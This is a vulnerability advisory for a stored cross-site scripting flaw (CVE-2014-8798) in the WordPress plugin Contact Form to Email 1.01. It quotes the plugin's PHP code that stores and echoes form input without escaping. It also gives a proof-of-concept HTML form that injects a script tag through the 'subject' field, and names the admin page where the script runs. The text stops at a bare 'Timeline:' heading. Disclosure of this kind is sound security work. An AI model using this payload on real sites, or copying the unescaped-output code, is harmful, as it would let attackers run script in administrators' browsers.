Contact Form to Email 1.01 XSS

Homepage:

https://wordpress.org/plugins/contact-form-to-email/

CVE-ID

CVE-2014-8798

CVSS Score

4.3

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:N/A:N)

Description:

Datas are not escaped correctly.

File: contact-form-to-email\cp-main-class.inc.php (I skip unnecessary lines)

$buffer = "";
foreach ($_POST as $item => $value)
if (isset($fields[str_replace($sequence,'',$item)]))
{
    $buffer .= $fields[str_replace($sequence,'',$item)] . ": ". (is_array($value)?(implode(", ",$value)):($value)) . "\n\n";
    $params[str_replace($sequence,'',$item)] = $value;
}
$buffer_A = $buffer;
$rows_affected = $wpdb->insert( $wpdb->prefix.$this->table_messages, array( 'formid' => $this->item,
                                'time' => current_time('mysql'),
                                'ipaddr' => $_SERVER['REMOTE_ADDR'],
                                'notifyto' => $_POST[$to.$sequence],
                                'posted_data' => serialize($params),
                                'data' =>$buffer_A
                               ) );

XSS is visible for admin.

File: cp-admin-int-message-list.inc.php

$data = $events[$i]->data;		        
$posted_data = unserialize($events[$i]->posted_data);		        
foreach ($posted_data as $item => $value)
    if (strpos($item,"_url") && $value != '')		         
    {
        $data = str_replace ($posted_data[str_replace("_url","",$item)],'<a href="'.$value.'" target="_blank">'.$posted_data[str_replace("_url","",$item)].'</a><br />',$data);  		                
    }    
echo str_replace("\n","<br />",$data);

Proof of Concept:

We assume that admin uses default form with “subject” field and doesn’t use captcha.

If not, use form directly on website and put XSS in any field.

<form method="POST" action="http://wordpress-instalation/">
    <input type="hidden" name="cp_pform_psequence" value="_1">
    <input type="hidden" name="cp_contactformtoemail_pform_process" value="1">
    Form Id: <input type="text" name="cp_contactformtoemail_id" value="1"><br />
    XSS:<input type="text" name="subject_1" value="&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

XSS will be visible for admin:

http://wordpress-instalation/wp-admin/options-general.php?page=cp_contactformtoemail&list=1&cal=%form_id%

Timeline: